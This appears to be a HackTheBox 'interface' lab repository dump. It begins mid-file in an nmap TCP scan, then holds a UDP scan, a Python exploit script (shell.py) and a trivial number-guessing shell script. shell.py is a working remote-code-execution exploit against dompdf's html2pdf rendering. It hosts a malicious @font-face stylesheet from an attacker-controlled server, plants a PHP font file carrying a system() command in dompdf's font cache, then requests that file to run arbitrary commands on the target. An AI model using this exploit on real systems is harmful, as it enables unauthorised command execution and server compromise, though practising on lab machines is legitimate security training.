7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="SYN Stealth Scan" time="1676142240"/>
+<taskend task="SYN Stealth Scan" time="1676142241" extrainfo="1000 total ports"/>
+<taskbegin task="Service scan" time="1676142241"/>
+<taskend task="Service scan" time="1676142248" extrainfo="2 services on 1 host"/>
+<taskbegin task="Traceroute" time="1676142253"/>
+<taskend task="Traceroute" time="1676142253"/>
+<taskbegin task="Parallel DNS resolution of 1 host." time="1676142253"/>
+<taskend task="Parallel DNS resolution of 1 host." time="1676142264"/>
+<taskbegin task="NSE" time="1676142264"/>
+<taskend task="NSE" time="1676142269"/>
+<taskbegin task="NSE" time="1676142269"/>
+<taskend task="NSE" time="1676142269"/>
+<taskbegin task="NSE" time="1676142269"/>
+<taskend task="NSE" time="1676142269"/>
+<host starttime="1676142240" endtime="1676142269"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.129.146.193" addrtype="ipv4"/>
+<hostnames>
+<hostname name="interface.htb" type="user"/>
+<hostname name="interface.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="998">
+<extrareasons reason="reset" count="998" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+</extraports>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.7" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:7.6p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=&#xa;  256 cc62905560a658629e6b80105c799b55 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy"><table>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="fingerprint">01848c66d34ec4b1611f2d4d389c42c3</elem>
+<elem key="bits">256</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=</elem>
+</table>
+<table>
+<elem key="type">ssh-ed25519</elem>
+<elem key="fingerprint">cc62905560a658629e6b80105c799b55</elem>
+<elem key="bits">256</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="nginx" version="1.14.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.14.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Site Maintenance"><elem key="title">Site Maintenance</elem>
+</script><script id="http-server-header" output="nginx/1.14.0 (Ubuntu)"><elem>nginx/1.14.0 (Ubuntu)</elem>
+</script><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+</table>
+</script><script id="http-favicon" output="Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA"/></port>
+</ports>
+<os><portused state="open" proto="tcp" portid="22"/>
+<portused state="closed" proto="tcp" portid="1"/>
+<osmatch name="Linux 5.0" accuracy="88" line="68042">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.0 - 5.4" accuracy="88" line="68103">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 2.6.32" accuracy="88" line="55671">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.4" accuracy="86" line="68176">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="86"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 4.15 - 5.6" accuracy="85" line="67238">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="85"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="85"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6BD%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=105%GCD=1%ISR=10C%TI=Z%TS=A)&#xa;OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=N)&#xa;T7(R=N)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
+</os>
+<uptime seconds="1617095" lastboot="Tue Jan 24 02:52:54 2023"/>
+<distance value="2"/>
+<tcpsequence index="261" difficulty="Good luck!" values="2B83A74A,E3D01AFE,95DA3B8B,875B7E6B,FEC71B2F,A3BBB7B5"/>
+<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
+<tcptssequence class="1000HZ" values="6062A357,6062A3BE,6062A45C,6062A494,6062A4F2,6062A54D"/>
+<trace port="1720" proto="tcp">
+<hop ttl="1" ipaddr="10.10.16.1" rtt="58.77"/>
+<hop ttl="2" ipaddr="10.129.146.193" rtt="71.96" host="interface.htb"/>
+</trace>
+<times srtt="53545" rttvar="18246" to="126529"/>
+</host>
+<taskbegin task="NSE" time="1676142269"/>
+<taskend task="NSE" time="1676142269"/>
+<taskbegin task="NSE" time="1676142269"/>
+<taskend task="NSE" time="1676142269"/>
+<taskbegin task="NSE" time="1676142269"/>
+<taskend task="NSE" time="1676142269"/>
+<runstats><finished time="1676142269" timestr="Sat Feb 11 20:04:29 2023" summary="Nmap done at Sat Feb 11 20:04:29 2023; 1 IP address (1 host up) scanned in 31.39 seconds" elapsed="31.39" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>

HTB/interface/results/scans/xml/_top_100_udp_nmap.xml

@@ -0,0 +1,72 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml interface.htb -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml interface.htb" start="1676142239" startstr="Sat Feb 11 20:03:59 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="UDP Scan" time="1676142240"/>
+<taskend task="UDP Scan" time="1676142327" extrainfo="100 total ports"/>
+<taskbegin task="Service scan" time="1676142327"/>
+<taskprogress task="Service scan" time="1676142383" percent="7.69" remaining="672" etc="1676143055"/>
+<taskend task="Service scan" time="1676142425" extrainfo="13 services on 1 host"/>
+<taskbegin task="Traceroute" time="1676142427"/>
+<taskend task="Traceroute" time="1676142427"/>
+<taskbegin task="Parallel DNS resolution of 1 host." time="1676142427"/>
+<taskend task="Parallel DNS resolution of 1 host." time="1676142428"/>
+<taskbegin task="NSE" time="1676142428"/>
+<taskprogress task="NSE" time="1676142459" percent="99.50" remaining="1" etc="1676142459"/>
+<taskend task="NSE" time="1676142471"/>
+<taskbegin task="NSE" time="1676142471"/>
+<taskend task="NSE" time="1676142472"/>
+<taskbegin task="NSE" time="1676142472"/>
+<taskend task="NSE" time="1676142472"/>
+<host starttime="1676142241" endtime="1676142472"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.129.146.193" addrtype="ipv4"/>
+<hostnames>
+<hostname name="interface.htb" type="user"/>
+<hostname name="interface.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="87">
+<extrareasons reason="port-unreach" count="87" proto="udp" ports="7,9,19,49,53,67,69,88,111,120,123,135-139,158,161-162,427,443,445,497,500,514-515,518,520,623,626,996-999,1022-1023,1025-1028,1030,1433-1434,1645-1646,1701,1718,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,33281,49152-49153,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201"/>
+</extraports>
+<port protocol="udp" portid="17"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="qotd" method="table" conf="3"/></port>
+<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
+<port protocol="udp" portid="80"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http" method="table" conf="3"/></port>
+<port protocol="udp" portid="177"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="xdmcp" method="table" conf="3"/></port>
+<port protocol="udp" portid="593"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http-rpc-epmap" method="table" conf="3"/></port>
+<port protocol="udp" portid="631"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="ipp" method="table" conf="3"/></port>
+<port protocol="udp" portid="1029"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="solid-mux" method="table" conf="3"/></port>
+<port protocol="udp" portid="1719"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="h323gatestat" method="table" conf="3"/></port>
+<port protocol="udp" portid="3703"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="adobeserver-3" method="table" conf="3"/></port>
+<port protocol="udp" portid="4444"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="krb524" method="table" conf="3"/></port>
+<port protocol="udp" portid="32815"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="udp" portid="49154"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
+<port protocol="udp" portid="65024"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
+</ports>
+<os><portused state="closed" proto="udp" portid="7"/>
+<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/11%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63E7E788%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;SEQ(CI=Z)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
+</os>
+<distance value="2"/>
+<trace port="49192" proto="udp">
+<hop ttl="1" ipaddr="10.10.16.1" rtt="33.86"/>
+<hop ttl="2" ipaddr="10.129.146.193" rtt="33.95" host="interface.htb"/>
+</trace>
+<times srtt="34910" rttvar="12035" to="100000"/>
+</host>
+<taskbegin task="NSE" time="1676142472"/>
+<taskend task="NSE" time="1676142472"/>
+<taskbegin task="NSE" time="1676142472"/>
+<taskend task="NSE" time="1676142472"/>
+<taskbegin task="NSE" time="1676142472"/>
+<taskend task="NSE" time="1676142472"/>
+<runstats><finished time="1676142472" timestr="Sat Feb 11 20:07:52 2023" summary="Nmap done at Sat Feb 11 20:07:52 2023; 1 IP address (1 host up) scanned in 233.62 seconds" elapsed="233.62" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>

HTB/interface/shell.py

@@ -0,0 +1,91 @@
+import hashlib
+import os
+import subprocess
+import sys
+import time
+
+from flask import Flask, Response
+import requests, base64
+import random
+from threading import Thread
+
+app = Flask(__name__)
+ttf = b""
+md5 = ""
+
+with open("exploit_font_template.php", "rb") as file:
+    ttf = file.read()
+
+cmd = sys.argv[1].encode()
+
+#print(ttf + b"<?php system('" + cmd + b"') ?>")
+#exit()
+got_php = False
+got_css = False
+proxy = {'http':'http://127.0.0.1:8080'}
+
+@app.route('/css/<name>')
+def css(name):
+    global md5,got_css
+    got_css = True
+    url = f"http://10.10.16.47/exploit/exploit_font{random.randint(0,9999)}.php"
+    md5 = hashlib.md5(url.encode()).hexdigest()
+    return Response("""@font-face {
+    font-family:'exploitfont';
+    src:url('""" + url + """');
+    font-weight:'normal';
+    font-style:'normal';
+  }""")
+
+@app.route('/exploit/<name>')
+def exploit(name):
+    global ttf, got_php
+    got_php = True
+    print(f"cmd = {cmd}")
+    return ttf + b"<?php system('" + cmd + b"') ?>"
+
+class Server(Thread):
+
+    port = 80
+    cmd = b''
+
+    def __int__(self):
+        super(Server, self).__init__()
+
+    def setIP(self, ip):
+        self.ip = ip
+
+    def setPort(self, port):
+        self.port = port
+
+    def setServerObject(self, obj):
+        self.app = obj
+
+    def run(self) -> None:
+        try:
+            self.app.run(host=self.ip, port=self.port)
+        except Exception as e:
+            print(f"exception: {e}")
+
+import logging
+
+log = logging.getLogger('werkzeug')
+log.setLevel(logging.ERROR)
+
+if __name__ == '__main__':
+    data = {"html":f"<link rel=stylesheet href='http://10.10.16.47/css/{random.randint(0,99999)}.css'>"}
+    server = Server()
+    server.setIP("10.10.16.47")
+    server.setPort("80")
+    server.setServerObject(app)
+    server.start()
+    time.sleep(0.5)
+    requests.post("http://prd.m.rendering-api.interface.htb/api/html2pdf", json=data, proxies=proxy)
+    while not got_php:
+        pass
+    r = requests.get(f'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_{md5}.php')
+    print(r.text[440:])
+
+    subprocess.call(['kill', str(os.getpid())])
+
+

HTB/interface/test.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+read -rp "Enter guess: " num
+if [[ $num -eq 42 ]]
+then
+  echo "Correct"
+else
+  echo "Wrong"
+fi